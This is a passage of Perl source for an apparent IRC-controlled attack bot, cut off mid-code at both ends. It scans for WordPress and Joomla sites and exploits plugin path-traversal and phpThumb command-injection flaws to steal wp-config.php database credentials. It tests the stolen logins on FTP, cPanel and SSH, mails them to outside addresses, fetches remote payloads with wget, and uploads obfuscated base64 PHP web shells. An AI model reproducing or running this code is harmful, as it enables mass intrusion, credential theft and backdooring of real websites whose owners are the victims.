{ $user = $1; } #&msg("$base","$wplogo15[6cnf15]7 $host 15[3 User 15:3 $user 4|3 Pass 15:3 $pass 15]"); &cepanel($host,$user,$pass,$chan,$engine); &cpanx2($url,$chan,$site,$engine); } } sub cpanx2() { my $url = $_[0]; my $chan = $_[1]; my $site = $_[2]; my $engine = $_[3]; my $logo = $_[4]; my $data = &get_content($url); my $psite = "http://".$site; if ($psite =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) { $host = $2; } if ($data =~ /password="(.*)"/g ) { if ($data =~ /password="(.*)"/) { $pass = $1; } if ($data =~ /user=(.*)/) { $user = $1; } #&msg("$base","$wplogo15[6cnf15]7 $host 15[3 User 15:3 $user 4|3 Pass 15:3 $pass 15]"); &cepanel($host,$user,$pass,$chan,$engine); } } sub cepanel() { my $host = $_[0]; my $user = $_[1]; my $pass = $_[2]; my $chan = $_[3]; my $engine = $_[4]; my $logo = $_[5]; my $success = 1; use Net::FTP; my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 5); $success = 0 if $ftp->login($user,$pass); $ftp->quit; if ($success == 0) { &msg("$admin","15$engine 4<9=4>9 cPaneL 4<9=4>8 http://".$host." 3 $user 4:3 $pass "); &msg("$channel","![9X]! 9cPaneL 4Sent to 9*8 $admin 9* "); $mailtype = "content-type: text/html"; $sendmail = '/usr/sbin/sendmail'; $sender = "myluph\@blackunix.us"; $subject = "myluph - Cpanel info :"; $mailto = "gomoney742\@gmail.com"; open (SENDMAIL, "| $sendmail -t"); print SENDMAIL "$mailtype\n"; print SENDMAIL "Subject: $subject\n"; print SENDMAIL "From: $sender\n"; print SENDMAIL "To: $mailto\n\n"; print SENDMAIL "Setoran FTP or cPaneL -> Host: $host Login: $user Pass: $pass \n\n"; close (SENDMAIL); #print "mail has been target Sent to $mailto\n"; } } sub afd() { my $chan = $_[0]; my $site = $_[1]; my $engine = $_[2]; my $sever = $site; $sever =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; if(my $pid = fork){ waitpid($pid, 0); } else { if(fork){ exit; } else { my $cariteme = &get_content("http://".$site, 3); my $cobicobi = &get_content("http://".$site."wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php"); my $cobucobu = &get_content("http://".$site."wp-admin/admin-ajax.php?action=revslider%20show%20image&img=../wp-config.php"); if($cobicobi =~ /DB_USER', '(.*?)'\);/i){ $user = $1; if($cobicobi =~ /DB_PASSWORD', '(.*?)'\);/i){ $pass = $1; } if($cobicobi =~ /DB_NAME', '(.*?)'\);/i){ $base = $1; } if($cobicobi =~ /DB_HOST', '(.*?)'\);/i){ $hozz = $1; } if($sqlview == 1){ &msg("$channel","![9X]! 12Hostname:3 $hozz - 14Username:3 ".$user." - 14Password:3 admin123 - 14Database:3 ".$base." "); } if($user =~ /\_/){ @users = split("_", $user); $user = $users[0]; &dbi_connect($hozz,$user,$pass,$base,$chan,$engine,$logo,$site);sleep(3); &ssh_connect($site,$host,$user,$pass,$chan,$engine,$logo);sleep(2); &ssh_connect2($site,$host,$user,$pass,$chan,$engine,$logo);sleep(2); &cpanx($cpanz,$chan,$site,$engine); } my $ftpcek = &get_content($ftptest."?ftp=".$sever."&user=".$user."&pass=".uri_escape($pass), 25); if($ftpcek =~ m/Login Succes/ig){ &msg("$admin","$revlogo12 ".$site." - 12".$user." - 12".$pass." 10FTP Authorized "); &msg("$nick","$revlogo12 ".$site." - 12".$user." - 12".$pass." 10FTP Authorized "); sleep(3); &msg("$channel","![9X]! 10Account send to Admin "); if($cpxcheck == 1){ my $bukasock = IO::Socket::INET->new(PeerAddr=>"$sever", PeerPort=>"2082", Proto=>"tcp", Timeout=>"4"); if($bukasock) { &msg("$admin","$revlogo12 ".$site." - 12".$user." - 12".$pass." 4CPX Detected "); &msg("$nick","$revlogo12 ".$site." - 12".$user." - 12".$pass." 4CPX Detected "); &get_content("http://bestphoenixairportparking.com/wp-content/plugins/statistics/log.php?name=XCP&host=$sever&user=$user&pass=".uri_escape($pass), 2); $bukasock->close; my $cpxcok = &get_content($cpxtest."?whm=".$sever."&user=".$user."&pass=".uri_escape($pass), 20); if($cpxcok =~ /Login Succes/){ &msg("$admin","$revlogo12 ".$site." - 12".$user." - 12".$pass." 5WHM Authorized "); } } } } } elsif($cobucobu =~ /DB_USER', '(.*?)'\);/i){ $user = $1; if($cobicobi =~ /DB_PASSWORD', '(.*?)'\);/i){ $pass = $1; } if($cobicobi =~ /DB_NAME', '(.*?)'\);/i){ $base = $1; } if($cobicobi =~ /DB_HOST', '(.*?)'\);/i){ $hozz = $1; } if($sqlview == 1){ &msg("$channel","![9X]! 12Hostname:3 $hozz - 14Username:3 ".$user." - 14Password:3 admin123 - 14Database:3 ".$base." "); } if($user =~ /\_/){ @users = split("_", $user); $user = $users[0]; &dbi_connect($hozz,$user,$pass,$base,$chan,$engine,$logo,$site);sleep(3); &ssh_connect($site,$host,$user,$pass,$chan,$engine,$logo);sleep(2); &ssh_connect2($site,$host,$user,$pass,$chan,$engine,$logo);sleep(2); &cpanx($cpanz,$chan,$site,$engine); } my $ftpcek = &get_content($ftptest."?ftp=".$sever."&user=".$user."&pass=".uri_escape($pass), 25); if($ftpcek =~ /Login Succes/){ &msg("$admin","$revlogo12 ".$site." - 12".$user." - 12".$pass." 10FTP Authorized "); &msg("$nick","$revlogo12 ".$site." - 12".$user." - 12".$pass." 10FTP Authorized "); sleep(3); &msg("$channel","![9X]! 10Account send to Admin "); if($cpxcheck == 1){ my $bukasock = IO::Socket::INET->new(PeerAddr=>"$sever", PeerPort=>"2082", Proto=>"tcp", Timeout=>"4"); if($bukasock) { &msg("$admin","$revlogo12 ".$site." - 12".$user." - 12".$pass." 4CPX Detected "); &msg("$nick","$revlogo12 ".$site." - 12".$user." - 12".$pass." 4CPX Detected "); &get_content("http://bestphoenixairportparking.com/wp-content/plugins/statistics/log.php?name=XCP&host=$sever&user=$user&pass=".uri_escape($pass), 2); $bukasock->close; my $cpxcok = &get_content($cpxtest."?whm=".$sever."&user=".$user."&pass=".uri_escape($pass), 20); if($cpxcok =~ /Login Succes/){ &msg("$admin","$revlogo12 ".$site." - 12".$user." - 12".$pass." 5WHM Authorized "); &msg("$nick","$revlogo12 ".$site." - 12".$user." - 12".$pass." 5WHM Authorized "); } } } } } elsif($cariteme =~ /http:\/\/(.+?)\/wp-content\/themes\/(.+?)\//i){ my $situs = $1; my $themex = $2; $afd[0] = "download.php?file=../../../wp-config.php"; $afd[1] = "download.php?filename=/../../../wp-config.php"; $afd[2] = "includes/download.php?file=../../../../wp-config.php"; $afd[3] = "lib/scripts/download.php?file=../../../../../wp-config.php"; $afd[4] = "download/download.php?file=../../../../wp-config.php"; $afd[5] = "download.php?download=../../../wp-config.php"; foreach my $press (@afd){ my $cobicobu = &get_content("http://".$situs."/wp-content/themes/".$themex."/".$press, 3); if($cobicobu =~ /DB_USER', '(.*?)'\);/i){ $user = $1; if($cobicobu =~ /DB_PASSWORD', '(.*?)'\);/i){ $pass = $1; } if($cobicobu =~ /DB_NAME', '(.*?)'\);/i){ $base = $1; } if($cobicobu =~ /DB_HOST', '(.*?)'\);/i){ $hozz = $1; } if($sqlview == 1){ &msg("$channel","![9X]! 14Hostname:3 $hozz - 14Username:3 ".$user." - 14Password:3 admin12321 - 14Database:3 ".$base." "); } if($user =~ /\_/){ @users = split("_", $user); $user = $users[0]; &dbi_connect($hozz,$user,$pass,$base,$chan,$engine,$logo,$site);sleep(3); &ssh_connect($site,$host,$user,$pass,$chan,$engine,$logo);sleep(2); &ssh_connect2($site,$host,$user,$pass,$chan,$engine,$logo);sleep(2); &cpanx($cpanz,$chan,$site,$engine); } my $ftpcex = &get_content($ftptest."?ftp=".$sever."&user=".$user."&pass=".uri_escape($pass), 25); if($ftpcex =~ /Login Succes/){ &msg("$admin","$revlogo12 ".$site." - 12".$user." - 12".$pass." 10FTP Authorized "); &msg("$nick","$revlogo12 ".$site." - 12".$user." - 12".$pass." 10FTP Authorized "); sleep(3); &msg("$channel","![9X]! 10Account send to Admin "); if($cpxcheck == 1){ my $bukaseck = IO::Socket::INET->new(PeerAddr=>"$sever", PeerPort=>"2082", Proto=>"tcp", Timeout=>"4"); if($bukaseck) { &msg("$admin","$revlogo12 ".$site." - 12".$user." - 12".$pass." 4CPX Detected "); &msg("$nick","$revlogo12 ".$site." - 12".$user." - 12".$pass." 4CPX Detected "); &get_content("http://bestphoenixairportparking.com/wp-content/plugins/statistics/log.php?name=XCP&host=$sever&user=$user&pass=".uri_escape($pass), 2); $bukaseck->close; my $cpxcok = &get_content($cpxtest."?whm=".$sever."&user=".$user."&pass=".uri_escape($pass), 20); if($cpxcok =~ /Login Succes/){ &msg("$admin","$revlogo12 ".$site." - 12".$user." - 12".$pass." 5WHM Authorized "); &msg("$nick","$revlogo12 ".$site." - 12".$user." - 12".$pass." 5WHM Authorized "); } } } } last; } } } else { $afd[0] = "/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=../../../wp-config.php"; $afd[1] = "/wp-content/plugins/apptha-slider-gallery/asgallDownload.php?imgname=../../../wp-config.php"; $afd[2] = "/wp-content/plugins/mac-photo-gallery/macdownload.php?albid=../../../wp-config.php"; $afd[3] = "/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php"; $afd[4] = "/wp-content/plugins/thecartpress/modules/Miranda.class.php?page=../../../../wp-config.php%00"; $afd[5] = "/wp-content/plugins/advanced-uploader/upload.php?destinations=../../../wp-config.php%00"; $afd[6] = "/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../wp-config.php"; $afd[7] = "/wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=../../../../wp-config.php"; $afd[8] = "/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=../../../../wp-config.php"; $afd[9] = "/?action=cpis_init&cpis-action=f-download&purchase_id=1&cpis_user_email=kontol\@dancok.org&f=../../../../wp-config.php"; $afd[10] = "/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../wp-config.php"; foreach my $press (@afd){ my $cobicobi = &get_content("http://".$situs.$press, 3); if($cobicobi =~ /DB_USER', '(.*?)'\);/i){ $user = $1; if($cobicobi =~ /DB_PASSWORD', '(.*?)'\);/i){ $pass = $1; } if($cobicobi =~ /DB_NAME', '(.*?)'\);/i){ $base = $1; } if($cobicobi =~ /DB_HOST', '(.*?)'\);/i){ $hozz = $1; } if($sqlview == 1){ &msg("$channel","![9X]! 14Hostname:3 $hozz - 14Username:3 ".$user." - 14Password:3 admin32123 - 14Database:3 ".$base." "); } if($user =~ /\_/){ @users = split("_", $user); $user = $users[0]; &dbi_connect($hozz,$user,$pass,$base,$chan,$engine,$logo,$site);sleep(3); &ssh_connect($site,$host,$user,$pass,$chan,$engine,$logo);sleep(2); &ssh_connect2($site,$host,$user,$pass,$chan,$engine,$logo);sleep(2); &cpanx($cpanz,$chan,$site,$engine); } my $ftpcex = &get_content($ftptest."?ftp=".$sever."&user=".$user."&pass=".uri_escape($pass), 25); if($ftpcex =~ /Login Succes/){ &msg("$admin","$revlogo12 ".$site." - 12".$user." - 12".$pass." 10FTP Authorized "); &msg("$nick","$revlogo12 ".$site." - 12".$user." - 12".$pass." 10FTP Authorized "); sleep(3); &msg("$channel","![9X]! 10Account send to Admin "); if($cpxcheck == 1){ my $bukaseck = IO::Socket::INET->new(PeerAddr=>"$sever", PeerPort=>"2082", Proto=>"tcp", Timeout=>"4"); if($bukaseck) { &msg("$admin","$revlogo12 ".$site." - 12".$user." - 12".$pass." 4CPX Detected "); &msg("$nick","$revlogo12 ".$site." - 12".$user." - 12".$pass." 4CPX Detected "); &get_content("http://bestphoenixairportparking.com/wp-content/plugins/statistics/log.php?name=XCP&host=$sever&user=$user&pass=".uri_escape($pass), 2); $bukaseck->close; my $cpxcok = &get_content($cpxtest."?whm=".$sever."&user=".$user."&pass=".uri_escape($pass), 20); if($cpxcok =~ /Login Succes/){ &msg("$admin","$revlogo12 ".$site." - 12".$user." - 12".$pass." 5WHM Authorized "); &msg("$nick","$revlogo12 ".$site." - 12".$user." - 12".$pass." 5WHM Authorized "); } } } } last; } } } } exit; } } sub joomla_xpl() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$logo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$channel","![7$engine :7 Process :12 $$ ]! [ 6Finish ]"); } my $target = "http://".$site; my $hasil = &get_content($target); if ($hasil =~ /phpThumb/i){ if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $dor = "?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;wget%20http://www.soaresrama.pt/wp-includes/fonts/eaxt/info.aff%20-O%20style.php;&phpThumbDebug=9"; my $open = "?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;lwp-download%20http://www.soaresrama.pt/wp-includes/fonts/eaxt/info.aff%20;mv%20style.aff%20style.php;&phpThumbDebug=9"; my $explo = "http://".$site."phpThumb.php".$dor; my $explo2 = "http://".$site."phpThumb/phpThumb.php".$dor; my $openx = "http://".$site."phpThumb.php".$open; my $openxx = "http://".$site."phpThumb/phpThumb.php".$open; &get_content($explo); &get_content($explo2); &get_content($openx); &get_content($openxx); my $shell = "http://".$site."/style.php"; my $shell2 = "http://".$site."/phpThumb/style.php"; my $check = &get_content($shell."?cek"); if ($check =~ m/404 Not Found/ig){ my $safe = ""; my $os = ""; my $uid = ""; if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$channel","![9$engine]! 11Private Shell 4[3$os4][3safemode10:3$safe4]"); sleep(5); &msg("$admin","$allogo5[4-5=4[8$engine4]5=4-5] 4 $shell 14[3$os14][3safemode10:3$safe14]"); sleep(5); } my $check2 = &get_content($shell2."?cek"); if ($check2 =~ m/404 Not Found/ig){ my $safe = ""; my $os = ""; my $uid = ""; if ($check2 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check2 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check2 =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$channel","![9$engine]! 11Private Shell 4[3$os4][3safemode10:3$safe4]"); sleep(5); &msg("$admin","$allogo5[4-5=4[8$engine4]5=4-5] 4 $shell2 14[3$os14][3safemode10:3$safe14]"); sleep(5); } &shellx1x($chan,$site,$engine,$nick,$logo); } exit; } } } } } sub shellx1x() { my $chan = $_[0]; my $site = $_[1]; my $engine = $_[2]; my $nick = $_[3]; my $logo = $_[4]; my $crota = "http://".$site."/phpThumb/style.php"; my $crotb = "http://".$site."/style.php"; &postx("http://".$site,'system("wget http://www.soaresrama.pt/wp-includes/fonts/eaxt/info.aff -q -O ../style.php);'); my $html = &get_content($crota."?220=cd%20/tmp%20;wget%20http://wordpress.com.fce-eth.org/docx.txt%20;%20perl%20docx.txt%20;%20rm%20-rf%20doc*"); my $html2 = &get_content($crotb."?220=cd%20/tmp%20;wget%20http://wordpress.com.fce-eth.org/docx.txt%20;%20perl%20docx.txt%20;%20rm%20-rf%20doc*"); if ($html =~ /GIF89a/) { &get_content($crota); sleep(3); my $safe = ""; my $os = ""; my $uid = ""; if ($html =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($html =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($html =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$channel","![7$engine]! [ 8SheLL 2,1Target Sent to 12$nick 9$safe $os ]"); &msg("$admin","15$engine3 [Success]9 $crota 15(OS=$os) $uid "); sleep(2); } if ($html2 =~ /GIF89a/) { &get_content($crotb); my $safe = ""; my $os = ""; my $uid = ""; if ($html2 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($html2 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($html2 =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$admin","15$engine9 $crotb 15(OS=$os) $uid"); sleep(2); &msg("$channel","![7$engine]! [ 4,1SheLL 7Target Sent to 4$nick 9$safe $os ]"); } } sub postx() { my $target = $_[0]; my $code = "R0lGODlhPD9waHANCmV2YWwoZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoc3RycmV2KHN0cl9yb3QxMygnPThUK3RQVE5xOE5COEhSbVVSZkxzL1FoMWVJWkRlTWVhc1hmVjZDUUx1UDVFZWxsRHZxSmJrN0x4eGZXRncwYWloKy84MUhzV3JFcERlYnM5b2p4VytyQm1NVjB0K0Z0bjIxVE9TcUxOSXZBNURQQjdnemlOZkRuSnRaRnNKWW9CUDVVMjRNRFROKytZYnFtQVEvR3pkdVBtalVPTkpBWVNWMFZrUFZlM0RTR0x6ZGI2ZFdPK2dkZmE0cVFabk5BVHBqa1pTVEQ4Y1M2MFcvSHk5a2xmeHRTUkpiRmpjWmg0L3VEaHUyanRwK3VNL1huQXhLN2RGOWE2QitPbWJNTXdtSS9lWkp0cEtTOUNDTkMrQnZhSWRnYTJramhnZGNhMC9VSGNhcmdYSlhwNG1Ea0gzT0Jsalg5ZVkrOEthcEdsSm82R0szZDZzS0JiNXpHS2gwWDNoMmRRZEhuL2tjb24xaFFkTktORy8xR0JjMzVaalhjSkNlRkJpeWdWN3BRbEtjZzhiV3RLQ2tvaFdleGU2SXk3RW0zSTRIMjQvUVIwQy95M2VuWjgxOUxwbTVXZmZYblZCU3lDL1JndVVsTml2Q1M5b04wSHJkRW5JWWxqeFJXdUM5ZmRwZG81RXMyMW9nbnNPM3Bja0wxbDRhbjErTW1CTWxjSS9YdkZqQjc1ZGY3QW02ZWdJcW85ektsd1BxSTI5MEhaSmUyMU9JNnlCU3FENzc4bi9ES3Vwbktwc0x2R3JsbEFLbVVDeEpDK0M4ZTNnZElnN0dUSG1DSThmb1NsbWppcDBHWHhFK3lMclJMbnNuVEtCbkptcnAxWGRlRlVwaE1ldXhtaEtBWXBySmNlcjcybWNkVkd5emUvMW9BMEhzQjdtck1WRWM5Rno1NnhHVDg5M2Fweit0Y1VyajM2MTNFY3I2SmIxMHBuM2g2SGFkZlpzOU1rY1lJN0tnYzFONUQ3S1RYK3B6TXBybEZJM1V3dFg3enl6SWFnckZzVEh1Q20ya3Vzcm1DY25xOFFNOGMvcnBNWm1nKzYxVWNVM2RkQUVsNjJqSW42SWNwMmFuemliK215amYwb1orQ2dVNy9VeWdSc0RpbytYQXFvMzRZQTJ2SjNlemNyNjhKY0RrYy9yd3AwVExzbzhUMm5sQTlZM2VVejNrRzE3c3haUHNsb3M1MDdpQkJEV1NqL3FVTU1YbGorRE5QbTUrdVh2V2laWHlhNUhxdDdYcGlpR09hRjV4VitwSEFjVVZwZ0hVb3czc3dyTGRsSW1LWU1zSG56djJlZGI3V2tTSDBJTTl0KzQ4alhmQnFtOTRUNFMxYVFrNTVyT3VEK1FhemNvZUJpTnNjbURTckhkRTJ4Q1VBQWNFSkVmT0VDS0puUldoZmdsMEE2dHBBSlVMVjVsY3FLMnlDVFlGSEI2Z1VaVWxxQVBKa0pMcVFPRmFvNnF6aGNZTmJPMFdha0RZMVdBUFV2dVhhRTZ2NUhDUkVDSkVXRnR4NW8zTzJMNEtod0lKZmM1ZFBITFhmMjFPcVhKQkR2cXpSL3FFRDFtbkdGaFFMaFJwWTdRV3B4UmlmQ05BSlBkTXg5U1hFYVJpSjhqVUZUUkVTWnZvYUNVbERlbG9EYXhyUkIwVm9sdE91MjNKdEVEdVdvN2ZhZXVKcjMvZ3JLZkR0WEVMcWRsa1QzOFBJOWZzeWNhcWVVTWZTdTNFRWt0VjA4bFFLL3dEanYva1B2N1BnTGFtYjh2dWZoNEZXc2tJVXpub1JLU2pBM3RKMVBsTWVNclM2ci93V1dmdHYzYkRwZzFhQUJzSGorMEkwT1lHQ0JqQ1Rnc1ZWdksxcDNTUlRiTFNOTXBERWwzdm05b1JKdmt6VUNvWmxTL1JIK2pBNnBIUmpBeGc5b2pUU01JUVM0TzBwK21LdlBUdjljM3laMG1oUDYzdHVSeVdEc0ZGOGMzUHkyZ094U2lIZXUydzRJbVE3WjIwUnhvU09NTTAvWWhxaFJKaGlXRGJHWVppdlNRQkl0czBTZTFyQXc2VEphSkU2VHhRZUlXeXZMOXZqNVZQNjM5QUR0am55ZER5dWV1WWhNd3o3UFFyRFlpWHhUb09WYmpLVHZnalFraFNhZm5POUVnNlREZVBjTmVNS2tVZEJvVUNWcEFid1BhSEMwdXBvWFpkeVRQL3BNQWVOSVBWL1lQS3ZJYzZ2LzlIYkdBR2s2YlNlUFFWWEplaDVHYllYSHF4eVZOOGJRYVFoVEFwQmt6WnlPOWdWcElIeGkyQUlxUms1V0ljTFR0UE82RHVOV28rVlVscEluUzlWdVhRWlVRNXVpTlJXZWtodVZCbFQrMlFycGZrNGhqaG84TGJHUk5OM0tJTkJiZU1GQmZrMGZtdHFUbHBhTlJnVCtjV2toRzdwYnNUMm44RktnUW5uelFxaHNqSHp6dnBGb05YUnNtc1BMRy9Wd2tGdkZxbFEwYVhrd1BvSGpkUHd2ek1jK2xicCt5VjZFSjgrUFloaGZ4VjRNbkswZmZ4ejdBNkh6NEFUM241MHhZSmhIWUJEa1pLbFVaQkNyYnpXYk9VOUNIWk1laWsxaDFIaEt6UkJISFQ5UXE1U3ZzaE51NzJxdnBoeUxWYitSNTFEU3E5SHlXL0M4cVNVWE5vSkZIazVTRTY3WUwxMHhKS2drWHRBU0tMc0pIdkZJNjExZ2dodEhwOXNESEZ4Ly8yZ0RpcGhIQlh4end5SWdWQmwxSmZiWE9Gb3JoN1RCZ1BXR1RZSk9RNzBYc3QxbDBOSnBTNndEUHVPRzB2Z0ttRVN4d0tFU0hkUmt0ckI4QVdTUG45UUpUMEQwdTBNWDJHR2s2Znk4OGJIYkVCSmpMUHh4OTdNVG5yb0d2V2VubE84Z2tQSUpSK215QnlOeHN4Zzc0dCt6Z2Y5aHRha1puUkttUmxmSTMxTUJUU3BpRDB0VllpTjQ0R3U0dS92NUpyTEtCcnhrZ2JiSkZnYi9GemRHdE95VHdiNkp4YzZrUmdVZ0ZDZ1UwUXFLTXVnMG81aStrSWhsY0xoaWtjL3VPZmdhcU43K2ZFVkF1dnp2emh1d2hFV1RTRGtGcHZGNXJNWTlpb2pjWE1FRHY3ZXV0OFViS0VjWFZ4Zmh0cWs2Q05rcGtjWEE0cG1URHNWeW5peU5XU3I0ZHo0cDV2NXZTWXQyMDgzQmlxWC9DaWdDL0o3YzNXdXRUeXdUTU42UTJWdklEVkZKU01Zay9PUGtDbDU4Z0wybTYwYjZFbVcveWVNZXpvUUZCcmZGRnR0UnFQcXdYMGdkSzFUSTNlR3llWUVsZVU4SitwR1pWME5qUFdwY3F2N2dvWFR3U2k4dDRDUjFsVkd5WjFVMHZSQWprWXRpWXRHaktVZFZ4dWlFUitTY240cnZjaFMxYWtpRUhwNURMZVY0VS81bmdoZDZUdlc2aUhidjJrUktTUTNqbEZwTDRycWw0U1N1WHcrRzZHckdUWjFSbWdiRVlQNnFaTkpDTTJoUkozTmlHM1VwenY0d09iUHBPdUJoNm55cmppUnVMREtwSFVScFVDMzBJOUVOc09vZ0xlUTNiU0w5M0wwM1FoNWo2Z2t6RjA4S0RSbW8ydjRvU09UblZ6cmJkdklidWhOS2NjN1pYRmRQRTk1a01HcmYwa2Frak5MeW5WcDBQRnhUQ1NxQkpQUEV3TkF0RDhZRW90WkdMZ1BWZGhxUVgremRsajNPMXBBWDZYYmJNZXpmM1NwVnpHNTJSUVg2MWMrQTJCMCsyQlBpVVpna2FMOHFyaVVxZU0xbnA5ZW55N0s2cEVoRkdrOVp0SytZbWRSTnZYaGFNZEZ2bXVFYlcrN3RsUWFGbU1Ga0MyVnNna0FnaHFicWdMeHVjQ1hvV2JWSTFzUmM0VVIzRXpZbUNqaXp4dCtTZkF5UjBDRWhlOHRxMzk5TVAyck4vUjl0M1Uyb1Q2aEdBMHF1VnYvRDJjZlB5dEJzdzJsaUdCcDl5amsvaWlESnVaUkdwQ1IvUEU2MEdDcUFXU0pVKzJ1aTlDdCtDYzlpYnE0b3cvbTl5TDJVaGwveFI2M3BZNWF3MW5mRzlBTUhnc1FnVmJ3bVFsY3NhYmlzMFlDc2JhT2o3UzF0M1lhNnFsYlV2QnlORXVMdktxWXRDZ1Jib1lyTWRqR1VqbWJQejQxQWZidU1GbHF0Y1dDMFZ4dGFCNnQ3WXFDckJKamIwRmxOV0pBTXc0UVdBb0NPdDFVY3dJUVNlOXpIK1JoLy9WKzVDcnR4a2R3QzhqQ2tCMjN2NGNFK0ZpWGJUQTZxQ2J3eVZPdnpIcVlJS0k5SXVIUDZSdy9NemNXVG1veWhvbmx6VXQ1MW5yNlNoNERlcUVKcWtsd0J6SFpBNkFZaVpQVHFYYk9xR0JPMmlnY3dUM0dBNGlSTGdnSWN3SW0nKSkpKSk7DQo/Pg=="; my $browser = LWP::UserAgent->new; my $res = $browser->post($target."./style.php",['style.php'=> $code => 'application/octet-stream'],'Content-type'=>'form-data'); my $hasil = $res->content; return $hasil; } sub b2j_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$logo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$channel","![7$engine :7 Process :12 $$ ]! [11 Done.. ]"); } my $re = $go[rand(scalar(@go))]; sleep(2); my $bx = "http://".$site."/index.php?option=com_b2jcontact&view=loader&owner=component&id={}&bid={}&root=&type=uploader&&owner=component&id={}&qqfile=586cfc73826e4-/../../style.php"; my $ua = LWP::UserAgent->new; $ua->timeout(10); #&msg("$chanxxx","![9X]! 10$site [ 3* ]"); sleep(5); my $index='<?php eval(bAsE64_DecOde("c2V0X3RpbWVfbGltaXQoMCk7CmVycm9yX3JlcG9ydGluZygwKTsKaWYgKCFpc3NldCgkX1NFU1NJT05bJ2JhamFrJ10pKQl7CiR2aXNpdGNvdW50ID0gMDsKJHdlYiA9ICRfU0VSVkVSWyJIVFRQX0hPU1QiXTsKJGluaiA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOwokYm9keSA9ICJTZXRvcmFuIFNoZWxscyBcbiR3ZWIkaW5qIjsKJHNhZmVtMGRlID0gQGluaV9nZXQoJ3NhZmVfbW9kZScpOwppZiAoISRzYWZlbTBkZSkgeyRzZWN1cml0eT0gIlNBRkVfTU9ERSA9IE9GRiBCbGFja1BhbnRoZXJzIjt9CmVsc2UgeyRzZWN1cml0eT0gIlNBRkVfTU9ERSA9IE9OIEJhZCI7fTsKJHNlcnBlcj1nZXRob3N0YnluYW1lKCRfU0VSVkVSWydTRVJWRVJfQUREUiddKTsKJGluamVrdG9yID0gZ2V0aG9zdGJ5bmFtZSgkX1NFUlZFUlsnUkVNT1RFX0FERFInXSk7Cm1haWwoInJlYWx1bml4MDFAZ21haWwuY29tIiwgIiRib2R5IiwiSGFzaWwgQmFqYWthbiBodHRwOi8vJHdlYiRpbmpcbiRzZWN1cml0eVxuSVAgU2VydmVyID0gJHNlcnBlclxuIElQIEluamVjdG9yPSAkaW5qZWt0b3IiKTsKJF9TRVNTSU9OWydiYWphayddID0gMTsKfWVsc2V7CiRfU0VTU0lPTlsnYmFqYWsnXSsrO307CmlmKGlzc2V0KCRfR0VUWydjbG9uZSddKSl7CiRzb3VyY2UgPSAkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ107CiRkZXN0aSA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10uJy8nLidzdHlsZS5waHAnOwpyZW5hbWUoJHNvdXJjZSwgJGRlc3RpKTsKfQogICAgJHNpdGUgPSAkX0dFVFsndXJsJ107CiAgICAkY2VrID0gZmlsZV9nZXRfY29udGVudHMoIiRzaXRlIik7CiAgICBAZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgkY2VrKSkpOwogICAgZWNobyAiPHRpdGxlPjQwNCBOb3QgRm91bmQ8L3RpdGxlPjxicj4iOwogICAgaWYoaXNzZXQoJF9HRVRbJ2NlayddKSl7CiAgICBlY2hvICJTaW1wbGUgSW5qZWt0b3I8L2JyPjwvYnI+IjsgCiRzYWZlbTBkZSA9IEBpbmlfZ2V0KCdzYWZlX21vZGUnKTsKaWYgKCEkc2FmZW0wZGUpIHskc2VjdXJpdHk9ICJTQUZFX01PREUgOiBPRkYgQmxhY2tQYW50aGVycyI7fQplbHNlIHskc2VjdXJpdHk9ICJTQUZFX01PREUgOiBPTiBCYWQiO30KZWNobyAiPGZvbnQgc2l6ZT01IGNvbG9yPXllbGxvdz5Qb3dlcmVkIGJ5IEJsYWNrUGFudGhlcnM8YnI+IjsKZWNobyAiPGZvbnQgc2l6ZT0zIGNvbG9yPXdoaXRlPlN0YXR1cyA6IHJlYWR5IGZyZXNoIHRvb2xzIFNIRUxMUyBGVFAgQ1BBTkVMIFJEUCBNQUlMRVI8YnI+PGJyPiI7CmVjaG8gIjxmb250IHNpemU9MiBjb2xvcj1yZWQ+PGI+Ii4kc2VjdXJpdHkuIjwvYj48YnI+IjsKJGN1cl91c2VyPSIoIi5nZXRfY3VycmVudF91c2VyKCkuIikiOwplY2hvICI8Zm9udCBzaXplPTIgY29sb3I9IzY0RDMwMD48Yj5Vc2VyIDogdWlkPSIuZ2V0bXl1aWQoKS4kY3VyX3VzZXIuIiBnaWQ9Ii5nZXRteWdp